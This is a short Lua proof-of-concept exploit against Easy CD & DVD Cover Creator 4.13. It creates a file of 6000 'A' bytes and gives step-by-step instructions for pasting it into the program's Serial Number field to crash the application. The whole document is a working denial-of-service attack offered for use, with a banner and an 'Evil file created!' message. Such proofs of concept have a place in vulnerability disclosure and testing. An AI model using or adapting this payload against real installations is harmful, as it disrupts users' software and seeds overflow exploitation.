-- Title : Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
-- Writer : @uromulou
-- How it works?
--
-- 1 . Run this lua script...
-- 2 . Open the file created and copy content to clipboard...
-- 3 . Open Easy CD & DVD Cover Creator.exe...
-- 4 . Press Unlik Now...
-- 5 . Paste the content of file created into the Field: 'Serial Number'...
-- 6 . Press 'Continue' and watch the program crash !
--
-- The Banner
print("-> Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)!")
print("-> The writer is the uromulou!\n")
-- The Code
local buf = string.rep("\x41", 6000)
local my_file = io.open("buf.txt", "w")
print(string.format("* Creating %s bytes payload...", string.len(buf)))
my_file:write(buf)
my_file.close()
print("* Evil file created!")